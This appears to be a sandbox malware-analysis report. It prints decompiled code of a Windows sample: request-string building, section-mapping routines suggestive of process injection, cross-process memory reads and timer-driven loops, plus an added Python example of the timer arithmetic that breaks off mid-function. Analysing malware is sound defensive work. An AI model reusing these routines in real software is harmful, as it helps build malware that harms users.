                              					_t38 = E013E6DFA(_t63);
                              					if( *(_t66 + 0x10) == 0) {
                              						goto L18;
                              					} else {
                              						_t39 = E013E65F6(_t38,  *_t66);
                              						_v8 = _t39;
                              						if(_t39 == 0) {
                              							goto L18;
                              						} else {
                              							_t65 = __imp__; // 0x703bf5a0
                              							if(_a8 == 0) {
                              								L10:
                              								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                              								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                              								_t40 = E013E6DFA(_v8);
                              								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                              									goto L18;
                              								} else {
                              									_a4 = 0x800100;
                              									_t56 = E013E65F6(_t40,  *((intOrPtr*)(_t66 + 4)));
                              									if(_t56 == 0) {
                              										goto L18;
                              									} else {
                              										_t42 =  *0x13ed2b8; // 0x26ea5a8
                              										_t19 = _t42 + 0x13ee758; // 0x450047
                              										_t43 = _t19;
                              										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                              										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                              										E013E6DFA(_t56);
                              										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                              										if(_t45 == 0) {
                              											goto L18;
                              										} else {
                              											_t57 = 4;
                              											_v12 = _t57;
                              											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                              											if(_t45 != 0) {
                              												_a4 = _a4 | 0x00000100;
                              												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                              											}
                              											_push(_t57);
                              											_push( &_a8);
                              											_push(6);
                              											_push( *((intOrPtr*)(_t66 + 0x18)));
                              											if( *_t65() == 0) {
                              												goto L18;
                              											} else {
                              												_push(_t57);
                              												_push( &_a8);
                              												_push(5);
                              												_push( *((intOrPtr*)(_t66 + 0x18)));
                              												if( *_t65() == 0) {
                              													goto L18;
                              												} else {
                              													_t36 = 0;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							} else {
                              								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                              								if(_t39 == 0) {
                              									goto L18;
                              								} else {
                              									goto L10;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t36;
                               			}


                              APIs
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                              • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,013E572B,747C81D0,00000000,03AD9618,?,?,013E3B91,?,03AD9618,0000EA60), ref: 013E4653
                              • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,013E572B,747C81D0,00000000,03AD9618,?,?,013E3B91,?,03AD9618,0000EA60), ref: 013E477C
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                               • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                               • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                              • String ID:
                              • API String ID: 4097109750-0
                              • Opcode ID: 789f6b3e960b6fef887d5c8b22b5da59bbb05f8c05374fbda7c2387806fb7b9a
                              • Instruction ID: 5131c894b2cca5897dfd65b5b91ac907bca150e18f344000e168819cee46a70f
                              • Opcode Fuzzy Hash: 789f6b3e960b6fef887d5c8b22b5da59bbb05f8c05374fbda7c2387806fb7b9a
                              • Instruction Fuzzy Hash: 004138B1100319BFEB319FA8CD89EAA7BECAB18749F044529F612D60D1E771DA448B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E013E7562(intOrPtr* __eax, void** _a4) {
                              				int _v12;
                              				void* _v16;
                              				void* _v20;
                              				void* _v24;
                              				int _v28;
                              				int _v32;
                              				intOrPtr _v36;
                              				int _v40;
                              				int _v44;
                              				void* _v48;
                              				void* __esi;
                              				long _t34;
                              				void* _t39;
                              				void* _t47;
                              				intOrPtr* _t48;
                              
                              				_t48 = __eax;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_v24 =  *((intOrPtr*)(__eax + 4));
                              				_v16 = 0;
                              				_v12 = 0;
                              				_v48 = 0x18;
                              				_v44 = 0;
                              				_v36 = 0x40;
                              				_v40 = 0;
                              				_v32 = 0;
                              				_v28 = 0;
                              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                              				if(_t34 < 0) {
                              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                              				} else {
                              					 *_t48 = _v16;
                              					_t39 = E013E65B4(_t48,  &_v12); // executed
                              					_t47 = _t39;
                              					if(_t47 != 0) {
                              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                              					} else {
                              						memset(_v12, 0, _v24);
                              						 *_a4 = _v12;
                              					}
                              				}
                              				return _t47;
                               			}


                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,013E6DA4), ref: 013E75BF
                                • Part of subcall function 013E65B4: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,013E75D4,00000002,00000000,?,?,00000000,?,?,013E75D4,00000000), ref: 013E65E1
                              • memset.NTDLL ref: 013E75E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                               • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                               • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID:
                              • API String ID: 2533685722-0
                              • Opcode ID: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction ID: 7d7ed8203f3edeb7153e0ec89bd1668a5789e6c247dff5a892474f74af2258ae
                              • Opcode Fuzzy Hash: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction Fuzzy Hash: 9D2108B6D00219AFDB11DFA9C8849EEFBF9EB48254F104429E616F3250D731AA458FA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(?,00000000), ref: 0103165E
                              • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0104684F,00000000,00000000,00000028,00000100), ref: 01031680
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressMemory64ProcReadVirtualWow64
                              • String ID:
                              • API String ID: 752694512-0
                              • Opcode ID: 365e4b1798e6507efab47023e4555fc98cf6e0f0e1f9bcf47e67f0049cc62e8c
                              • Instruction ID: 58f5083cc19bec68a8e0cf9e9aadae8f4e73c5aad21f3ebd6587d2f4c1424a60
                              • Opcode Fuzzy Hash: 365e4b1798e6507efab47023e4555fc98cf6e0f0e1f9bcf47e67f0049cc62e8c
                              • Instruction Fuzzy Hash: 7FF0F976600209FFCB128F89DC44C9EBBBEEBD8390B14445AF994D3124D776D951DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,010396AE,00000000,00000000,010396AE,?,00000002,00000000,?,?,00000000,010396AE,000000FF,?), ref: 01023EE5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction ID: d2e46322fd53de99c2fc24df72acdca37f074af6fdc8e8865767a403406d68dd
                              • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction Fuzzy Hash: 58F0FEB690020CBFDB119FA5CC85C9FBBBDEB48344B00882AF55295450D6719E189B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E013E65B4(void** __esi, PVOID* _a4) {
                              				long _v8;
                              				void* _v12;
                              				void* _v16;
                              				long _t13;
                              
                              				_v16 = 0;
                              				asm("stosd");
                              				_v8 = 0;
                              				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                              				if(_t13 < 0) {
                              					_push(_t13);
                              					return __esi[6]();
                              				}
                              				return 0;
                               			}


                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,013E75D4,00000002,00000000,?,?,00000000,?,?,013E75D4,00000000), ref: 013E65E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                               • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                               • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                               • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction ID: 4300bde02d00e1325310075bfe61e35b1dc988ae41a3ba73709c8fb84b116423
                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction Fuzzy Hash: 0DF012B5A0030DFFDB119FA5CC89C9FBBFDEB44254F104939B152E1094D631AE088A60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtQueryInformationProcess.NTDLL(00000000,0102B24B,00000018,00000000,01050460), ref: 01044599
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 3b59ff89809fa4520bb891e1d5d4ac226cb5c53ce44533b7bc7067372396a6d2
                              • Instruction ID: 145a79e34c3a7d2266a7bc4745b543f34167afc6a296d6c493eb87c054d1d8e3
                              • Opcode Fuzzy Hash: 3b59ff89809fa4520bb891e1d5d4ac226cb5c53ce44533b7bc7067372396a6d2
                              • Instruction Fuzzy Hash: A5F03AB13002269BDB20CA59C8C5E9BBBA8EB067547104664EA41DBA56D620E905CBE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E013E6367(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16, void* _a24, intOrPtr _a32, void* _a40) {
                              				void* _v0;
                              				intOrPtr _v4;
                              				intOrPtr _v12;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				void* _v48;
                              				intOrPtr _v52;
                              				void* __edi;
                              				long _t30;
                              				intOrPtr _t31;
                              				intOrPtr _t32;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				intOrPtr _t35;
                              				void* _t38;
                              				intOrPtr _t39;
                              				int _t42;
                              				intOrPtr _t43;
                              				intOrPtr _t44;
                              				intOrPtr _t46;
                              				void* _t49;
                              				intOrPtr _t53;
                              				intOrPtr _t57;
                              				intOrPtr* _t59;
                              				void* _t60;
                              				intOrPtr _t65;
                              				intOrPtr _t71;
                              				intOrPtr _t74;
                              				intOrPtr _t78;
                              				int _t81;
                              				void* _t83;
                              				void* _t84;
                              				void* _t88;
                              				intOrPtr _t90;
                              				long _t92;
                              				intOrPtr* _t93;
                              				intOrPtr* _t94;
                              				int _t95;
                              				void* _t96;
                              				void* _t97;
                              				void* _t100;
                              				void* _t102;
                              
                              				_t88 = __edx;
                              				_t84 = __ecx;
                              				_t30 = __eax;
                              				_t100 =  &_v12;
                              				_t83 = _a16;
                              				_v4 = 8;
                              				if(__eax == 0) {
                              					_t30 = GetTickCount();
                              				}
                              				_t31 =  *0x13ed018; // 0x9945a377
                              				asm("bswap eax");
                              				_t32 =  *0x13ed014; // 0x3a87c8cd
                              				asm("bswap eax");
                              				_t33 =  *0x13ed010; // 0xd8d2f808
                              				asm("bswap eax");
                              				_t34 =  *0x13ed00c; // 0x13d015ef
                              				asm("bswap eax");
                              				_t35 =  *0x13ed2b8; // 0x26ea5a8
                              				_t3 = _t35 + 0x13ee633; // 0x74666f73
                              				_t95 = wsprintfA(_t83, _t3, 2, 0x3f87e, _t34, _t33, _t32, _t31,  *0x13ed02c,  *0x13ed004, _t30);
                              				_t38 = E013E8DA6();
                              				_t39 =  *0x13ed2b8; // 0x26ea5a8
                              				_t4 = _t39 + 0x13ee673; // 0x74707526
                              				_t42 = wsprintfA(_t95 + _t83, _t4, _t38);
                              				_t102 = _t100 + 0x38;
                              				_t96 = _t95 + _t42; // executed
                              				_t43 = E013E40AC(_t84); // executed
                              				_a32 = _t43;
                              				if(_t43 != 0) {
                              					_t78 =  *0x13ed2b8; // 0x26ea5a8
                              					_t7 = _t78 + 0x13ee8b2; // 0x736e6426
                              					_t81 = wsprintfA(_t96 + _t83, _t7, _t43);
                              					_t102 = _t102 + 0xc;
                              					_t96 = _t96 + _t81;
                              					HeapFree( *0x13ed270, 0, _a40);
                              				}
                              				_t44 = E013E8941();
                              				_a32 = _t44;
                              				if(_t44 != 0) {
                              					_t74 =  *0x13ed2b8; // 0x26ea5a8
                              					_t11 = _t74 + 0x13ee885; // 0x6f687726
                              					wsprintfA(_t96 + _t83, _t11, _t44);
                              					HeapFree( *0x13ed270, 0, _a40);
                              				}
                              				_t90 =  *0x13ed35c; // 0x3ad95b0
                              				_t46 = E013E3FB8(0x13ed00a, _t90 + 4);
                              				_t92 = 0;
                              				_a8 = _t46;
                              				if(_t46 != 0) {
                              					_t49 = RtlAllocateHeap( *0x13ed270, 0, 0x800); // executed
                              					_a24 = _t49;
                              					if(_t49 != 0) {
                              						E013E47EF(GetTickCount());
                              						_t53 =  *0x13ed35c; // 0x3ad95b0
                              						__imp__(_t53 + 0x40);
                              						asm("lock xadd [eax], ecx");
                              						_t57 =  *0x13ed35c; // 0x3ad95b0
                              						__imp__(_t57 + 0x40);
                              						_t59 =  *0x13ed35c; // 0x3ad95b0
                              						_t60 = E013EA7FB(1, _t88, _t83,  *_t59); // executed
                              						_t97 = _t60;
                              						asm("lock xadd [eax], ecx");
                              						if(_t97 != 0) {
                              							StrTrimA(_t97, 0x13ec2ac);
                              							_push(_t97);
                              							_t65 = E013E6F6D();
                              							_v20 = _t65;
                              							if(_t65 != 0) {
                              								_t93 = __imp__;
                              								 *_t93(_t97, _v0);
                              								 *_t93(_a4, _v20);
                              								_t94 = __imp__;
                              								 *_t94(_v4, _v32);
                              								 *_t94(_v12, _t97);
                              								_t71 = E013E3B55(0xffffffffffffffff, _v20, _v28, _v24); // executed
                              								_v52 = _t71;
                              								if(_t71 != 0 && _t71 != 0x10d2) {
                              									E013E55F1();
                              								}
                              								RtlFreeHeap( *0x13ed270, 0, _v48); // executed
                              								_t92 = 0;
                              							}
                              							HeapFree( *0x13ed270, _t92, _t97);
                              						}
                              						RtlFreeHeap( *0x13ed270, _t92, _a16); // executed
                              					}
                              					HeapFree( *0x13ed270, _t92, _v0);
                              				}
                              				RtlFreeHeap( *0x13ed270, _t92, _t83); // executed
                              				return _a4;
                               			}


                              APIs
                              • GetTickCount.KERNEL32 ref: 013E637E
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA826
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA82E
                                • Part of subcall function 013EA7FB: strcpy.NTDLL ref: 013EA845
                                • Part of subcall function 013EA7FB: lstrcat.KERNEL32(00000000,?), ref: 013EA850
                                • Part of subcall function 013EA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013EA86D
                              • wsprintfA.USER32 ref: 013E63CB
                              • wsprintfA.USER32 ref: 013E63E8
                              • wsprintfA.USER32 ref: 013E6413
                              • HeapFree.KERNEL32(00000000,?), ref: 013E6426
                              • wsprintfA.USER32 ref: 013E6445
                              • HeapFree.KERNEL32(00000000,?), ref: 013E6456
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 013E6485
                              • GetTickCount.KERNEL32 ref: 013E6497
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E64AB
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E64C9
                              • StrTrimA.SHLWAPI(00000000,013EC2AC,?,03AD95B0), ref: 013E64FB
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(03AD9B58,00000000,00000000,?,013E6507,00000000), ref: 013E6F7D
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(?), ref: 013E6F85
                                • Part of subcall function 013E6F6D: lstrcpy.KERNEL32(00000000,03AD9B58), ref: 013E6F99
                                • Part of subcall function 013E6F6D: lstrcat.KERNEL32(00000000,?), ref: 013E6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 013E651A
                              • lstrcpy.KERNEL32(?,?), ref: 013E6524
                              • lstrcat.KERNEL32(?,?), ref: 013E6534
                              • lstrcat.KERNEL32(?,00000000), ref: 013E653B
                              • RtlFreeHeap.NTDLL(00000000,?,?,?,?), ref: 013E656E
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 013E657A
                              • RtlFreeHeap.NTDLL(00000000,?,?,03AD95B0), ref: 013E6587
                              • HeapFree.KERNEL32(00000000,?), ref: 013E6594
                              • RtlFreeHeap.NTDLL(00000000,?), ref: 013E659E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$Free$lstrcatlstrlenwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                              • String ID: Uxt
                              • API String ID: 1384543093-1536154274
                              • Opcode ID: d5b6136bce220d052b3314500e7d142249b08835691ec640f913dd79e1c04576
                              • Instruction ID: c573b5d0570cf15030c5dc51696779caca6706a91cd86c6e01964b73c6d13cee
                              • Opcode Fuzzy Hash: d5b6136bce220d052b3314500e7d142249b08835691ec640f913dd79e1c04576
                              • Instruction Fuzzy Hash: F05179B1500314AFDB31ABA9DC49E5A7FEDFF88358F090825F548DA2E4CA31D919CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E013E5038(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                              				void _v48;
                              				long _v52;
                              				struct %anon52 _v60;
                              				char _v72;
                              				long _v76;
                              				void* _v80;
                              				union _LARGE_INTEGER _v84;
                              				struct %anon52 _v92;
                              				void* _v96;
                              				void* _v100;
                              				union _LARGE_INTEGER _v104;
                              				long _v108;
                              				intOrPtr _v120;
                              				struct %anon52 _v128;
                              				struct %anon52 _t46;
                              				void* _t51;
                              				long _t53;
                              				void* _t54;
                              				struct %anon52 _t60;
                              				long _t64;
                              				struct %anon52 _t65;
                              				intOrPtr _t67;
                              				void* _t68;
                              				void* _t72;
                              				signed int _t73;
                              				void* _t75;
                              				void* _t78;
                              				void** _t82;
                              				signed int _t86;
                              				void* _t89;
                              
                              				_t75 = __edx;
                              				_v52 = 0;
                              				memset( &_v48, 0, 0x2c);
                              				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                              				_t46 = CreateWaitableTimerA(0, 1, 0); // unnamed manual-reset timer (bManualReset = 1)
                              				_v60 = _t46;
                              				if(_t46 == 0) {
                              					_v92.HighPart = GetLastError();
                              				} else {
                              					_push(0xffffffff);
                              					_push(0xff676980); // high:low 0xFFFFFFFF:0xFF676980 = -10,000,000, i.e. one second in 100-ns units
                              					_push(0);
                              					_push( *0x13ed278); // count read from the sample's data area; count * -10,000,000 is a negative, i.e. relative, due time of count seconds
                              					_v76 = 0;
                              					_v80 = 0;
                              					L013EB030(); // ntdll!_allmul (64-bit multiply, see the API list below); result in edx:eax
                              					_v84.LowPart = _t46;
                              					_v80 = _t75;
                              					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                              					_t51 =  *0x13ed2a4; // 0x2a0
                              					_v76 = _t51;
                              					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff); // two handles (the timer and the handle read from 0x13ed2a4), bWaitAll = FALSE, INFINITE; only 0 (WAIT_OBJECT_0) continues below
                              					_v108 = _t53;
                              					if(_t53 == 0) {
                              						if(_a8 != 0) {
                              							L4:
                              							 *0x13ed284 = 5;
                              						} else {
                              							_t68 = E013E4C56(_t75); // executed
                              							if(_t68 != 0) {
                              								goto L4;
                              							}
                              						}
                              						_v104.LowPart = 0;
                              						L6:
                              						L6:
                              						if(_v104.LowPart == 1 && ( *0x13ed298 & 0x00000001) == 0) {
                              							_v104.LowPart = 2;
                              						}
                              						_t73 = _v104.LowPart;
                              						_t58 = _t73 << 4;
                              						_t78 = _t89 + (_t73 << 4) + 0x3c;
                              						_t74 = _t73 + 1;
                              						_v92.LowPart = _t73 + 1;
                              						_t60 = E013E5B5B(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                              						_v128.LowPart = _t60;
                              						if(_t60 != 0) {
                              							goto L17;
                              						}
                              						_t65 = _v92;
                              						_t97 = _t65 - 3;
                              						_v104.LowPart = _t65;
                              						if(_t65 != 3) {
                              							goto L6;
                              						} else {
                              							_t67 = E013E6006(_t74, _t97,  &_v72, _a4, _a8); // executed
                              							_v120 = _t67;
                              						}
                              						goto L12;
                              						L17:
                              						__eflags = _t60 - 0x10d2;
                              						if(_t60 != 0x10d2) {
                              							_push(0xffffffff);
                              							_push(0xff676980);
                              							_push(0);
                              							_push( *0x13ed27c);
                              							goto L21;
                              						} else {
                              							__eflags =  *0x13ed280; // 0x0
                              							if(__eflags == 0) {
                              								goto L12;
                              							} else {
                              								_t60 = E013E55F1();
                              								_push(0xffffffff);
                              								_push(0xdc3cba00); // 0xFFFFFFFF:0xDC3CBA00 = -600,000,000, i.e. one minute in 100-ns units, so the count at 0x13ed280 is in minutes
                              								_push(0);
                              								_push( *0x13ed280);
                              								L21:
                              								L013EB030();
                              								_v104.LowPart = _t60;
                              								_v100 = _t78;
                              								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                              								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                              								__eflags = _t64;
                              								_v128 = _t64;
                              								if(_t64 == 0) {
                              									goto L6;
                              								} else {
                              									goto L12;
                              								}
                              							}
                              						}
                              						L25:
                              					}
                              					L12:
                              					_t82 =  &_v72;
                              					_t72 = 3;
                              					do {
                              						_t54 =  *_t82;
                              						if(_t54 != 0) {
                              							RtlFreeHeap( *0x13ed270, 0, _t54); // executed
                              						}
                              						_t82 =  &(_t82[4]);
                              						_t72 = _t72 - 1;
                              					} while (_t72 != 0);
                              					CloseHandle(_v80);
                              				}
                              				return _v92.HighPart;
                              				goto L25;
                              			}

                              (instruction address column of the E013E5038 listing, 0x013e5038 to 0x013e5200, with 0x00000000 entries for lines that map to no instruction; the instruction text did not survive extraction)


                              APIs
                              • memset.NTDLL ref: 013E5052
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 013E505E
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 013E5086
                              • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 013E50A6
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,013E5A39,?), ref: 013E50C1
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,013E5A39,?,00000000), ref: 013E5169
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,013E5A39,?,00000000,?,?), ref: 013E5179
                              • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 013E51B3
                              • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 013E51CD
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 013E51D9
                                • Part of subcall function 013E4C56: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03AD93B8,00000000,?,747DF710,00000000,747DF730), ref: 013E4CA5
                                • Part of subcall function 013E4C56: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03AD93F0,?,00000000,30314549,00000014,004F0053,03AD93AC), ref: 013E4D42
                                • Part of subcall function 013E4C56: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,013E50D9), ref: 013E4D54
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,013E5A39,?,00000000,?,?), ref: 013E51EC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                              • String ID: Uxt
                              • API String ID: 3521023985-1536154274
                              • Opcode ID: 45b53e15170e20d2a2f80be0b0c77020974b73d9e17a5d67faefe71e0ced8229
                              • Instruction ID: 06162b0834dd28bd801540e83c7ac3b5aa75454abf23f0132e8db5a799b01388
                              • Opcode Fuzzy Hash: 45b53e15170e20d2a2f80be0b0c77020974b73d9e17a5d67faefe71e0ced8229
                              • Instruction Fuzzy Hash: FB517B75409321AFDB219F599C4899BBFECEF85368F108A1AF464D62D0D770D904CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%
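The due-time arithmetic of E013E5038 above, worked through in code. This is an added example written for this page, not code from the sample or from the sandbox: it models ntdll!_allmul and the relative due time that SetWaitableTimer accepts, using the constants visible in the listing (0xFF676980 and 0xDC3CBA00 with a high dword of 0xFFFFFFFF), and it assumes that the dword read from 0x13ed278 is a count taken from the sample's configuration, which the listing itself does not state.

```python
"""Timer arithmetic of E013E5038 (added example; not the sample's or the sandbox's code).

The listing pushes a dword read from 0x13ed278, then 0, 0xFF676980 and 0xFFFFFFFF,
and calls ntdll!_allmul, a 64-bit multiply. The product goes to SetWaitableTimer as
the due time; a negative due time is a relative interval in 100-nanosecond units,
so the constant pair fixes the unit of the configured count. Assumption: the dword
at 0x13ed278 is a count from the sample's configuration (the listing does not say).
"""
import struct
from typing import List, Tuple

HNS_PER_SECOND = 10_000_000  # 100-ns ticks per second (FILETIME resolution)
WAIT_OBJECT_0 = 0
WAIT_TIMEOUT = 0x102


def signed64(low: int, high: int) -> int:
    """Rebuild the signed 64-bit value that _allmul receives as a (low, high) dword pair."""
    return struct.unpack("<q", struct.pack("<II", low & 0xFFFFFFFF, high & 0xFFFFFFFF))[0]


def allmul(a_low: int, a_high: int, b_low: int, b_high: int) -> Tuple[int, int]:
    """ntdll!_allmul: signed 64-bit multiply; returns (eax, edx) = (low dword, high dword)."""
    product = (signed64(a_low, a_high) * signed64(b_low, b_high)) & 0xFFFFFFFFFFFFFFFF
    return product & 0xFFFFFFFF, product >> 32


def due_time_seconds(low: int, high: int) -> float:
    """Seconds a LARGE_INTEGER due time makes SetWaitableTimer wait. Negative = relative."""
    value = signed64(low, high)
    if value >= 0:
        raise ValueError("absolute due time (FILETIME since 1601), not a relative interval")
    return -value / HNS_PER_SECOND


def unit_seconds(multiplier_low: int, multiplier_high: int = 0xFFFFFFFF) -> float:
    """Seconds that one unit of the configured count is worth for a multiplier constant."""
    return due_time_seconds(*allmul(1, 0, multiplier_low, multiplier_high))


def arm_timer(count: int, multiplier_low: int, multiplier_high: int = 0xFFFFFFFF) -> Tuple[int, int]:
    """The (LowPart, HighPart) pair the sample stores before calling SetWaitableTimer."""
    return allmul(count, 0, multiplier_low, multiplier_high)


def wait_for_multiple_objects(signalled: List[bool]) -> int:
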